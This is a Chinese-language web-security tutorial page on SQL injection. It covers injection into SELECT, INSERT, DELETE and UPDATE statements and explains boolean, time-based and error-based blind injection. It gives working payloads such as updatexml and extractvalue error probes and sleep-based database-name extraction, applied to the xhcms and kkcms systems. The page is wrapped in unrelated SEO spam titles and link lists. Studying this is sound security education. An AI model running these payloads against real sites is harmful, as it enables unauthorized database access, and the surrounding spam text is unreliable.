当前位置: 首页 > wzjs >正文

有关于做茗茶的网站seopc流量排名官网

wzjs 2025/7/31 12:09:33
有关于做茗茶的网站,seopc流量排名官网,做是么网站,网站维护和推广#知识点 1、Web攻防-SQL注入-操作方法&增删改查 2、Web攻防-SQL注入-布尔&延时&报错&盲注 一、增删改查 1、功能:数据查询 查询:SELECT * FROM news where id$id 2、功能:新增用户,添加新闻等 增加:IN…
#知识点

1、Web攻防-SQL注入-操作方法&增删改查

2、Web攻防-SQL注入-布尔&延时&报错&盲注

一、增删改查

1、功能:数据查询

查询:SELECT * FROM news where id=$id

2、功能:新增用户,添加新闻等

增加:INSERT INTO news (字段名) VALUES (数据)

3、功能:删除用户,删除新闻等

删除:DELETE FROM news WHERE id=$id

4、功能:修改用户,修改文章等

修改:UPDATE news SET id=$id

二、布尔&报错&延迟

盲注就是在注入过程中,获取的数据不能回显至前端页面。

我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

解决:常规的联合查询注入union select不行的情况

我们可以知道盲注分为以下三类:

1、基于布尔的SQL盲注-逻辑判断

regexp,like,ascii,left,ord,mid

布尔:

and length(database())=7;

and left(database(),1)='p';

and left(database(),2)='pi';

and substr(database(),1,1)='p';

and substr(database(),2,1)='i';

and ord(left(database(),1))=112;

2、基于时间的SQL盲注-延时判断

if,sleep

延时:

and sleep(1);

and if(1>2,sleep(1),0);

and if(1<2,sleep(1),0);

3、基于报错的SQL盲注-报错回显

floor,updatexml,extractvalue

报错:

and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)#

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))#

参考:重要

like 'ro%' #判断ro或ro...是否成立

regexp '^xiaodi[a-z]' #匹配xiaodi及xiaodi...等

if(条件,5,0) #条件成立 返回5 反之 返回0

sleep(5) #SQL语句延时执行5秒

mid(a,b,c) #从位置b开始,截取a字符串的c位

substr(a,b,c) #从位置b开始,截取字符串a的c长度

left(database(),1),database() #left(a,b)从左侧截取a的前b位

length(database())=8 #判断数据库database()名的长度

ord=ascii ascii(x)=97 #判断x的ascii码是否等于97

4、三种盲注方式需要满足的条件

①基于延时注入:都不需要

or if(1=1,sleep(5),0)#

没报错没输出->延时注入

x' or if(1=1,sleep(5),0)#

x' or if((select database())='news_management',sleep(1),sleep(0))#

②基于布尔注入有数据库执行的结果有输出,为判断标准条件

or length(database())=6#

select有输出和insert没输出->布尔注入

x' or length(database())=15#

③基于报错注入:有数据库报错处理判断标准条件(即容错处理

or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#

select没报错和insert有报错->报错注入

x' or updatexml(1,concat(0x7e,(version())),0) or '#

参考:

12种报错注入+万能语句 - 简书

https://www.jianshu.com/p/bc35f8dd4f7c


 

https://www.cnblogs.com/impulse-/p/14227189.html

三、实际案例:报错&延时

1、xhcms系统-insert报错

' and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1) and '

2、kkcms系统-delete延时

or if(1=1,sleep(5),0)

or length(database())=5

or if(ord(left(database(),1))=107,sleep(1),0) ->判断数据库第一位ascii码是否等于107

or if(ord(substr(database(),2,1))=107,sleep(1),0)->判断数据库第二位ascii码是否等于107

3、学员学就用:

JSON注入文档

http://www.dtcms.com/wzjs/146546.html

相关文章:

  • 企业建站公司案例足球世界积分榜
  • 投资网站实名认证可以做吗seo短期培训班
  • 合作市建设局网站淘宝seo搜索优化
  • 沈阳网站制作联系方式在运营中seo是什么意思
  • 做微网站必须要有公众号吗网络营销的营销策略
  • 湖北企业模板建站开发成都网站建设方案托管
  • 镇江网站设计建设网上有卖网站链接的吗
  • 廊坊建设企业网站如何seo推广
  • 企业网站建设论文模板信阳网络推广公司
  • 关于茶文化网站建设的背景广东短视频seo营销
  • 怎么做网站的网盘快速的网站设计制作
  • 网站站外优化推广方式百度的相关搜索
  • 书店网站建设人员分配百度客服电话
  • 全国网站建设有实力谷歌seo最好的公司
  • 怎么做网盘网站网页设计排版布局技巧
  • 给金融的做网站 犯法吗星链seo管理
  • ai特效字体网站石家庄seo网站排名
  • 起点签约的书网站给做封面吗网站推广公司排名
  • 郑州做网站建设公司合肥网站建设
  • 成都网站制作网站设计网络营销平台的主要功能
  • 汽车美容网站开发地推网
  • 哈尔滨做网站哪家好今日的新闻
  • 做竞价网站要准备什么条件武汉大学人民医院东院
  • 做公司网站需要多少钱社群运营的经典案例
  • 活动策划怎么写百度seo排名点击软件
  • 石景山网站建设公司排行百度资源共享链接分享组
  • 信阳今日头条新闻seo优化推广软件
  • 西瓜网站建设网站模板及源码
  • 陕西省住房和城乡建设厅官方网站如何交换友情链接
  • 装饰公司网站建设媒体营销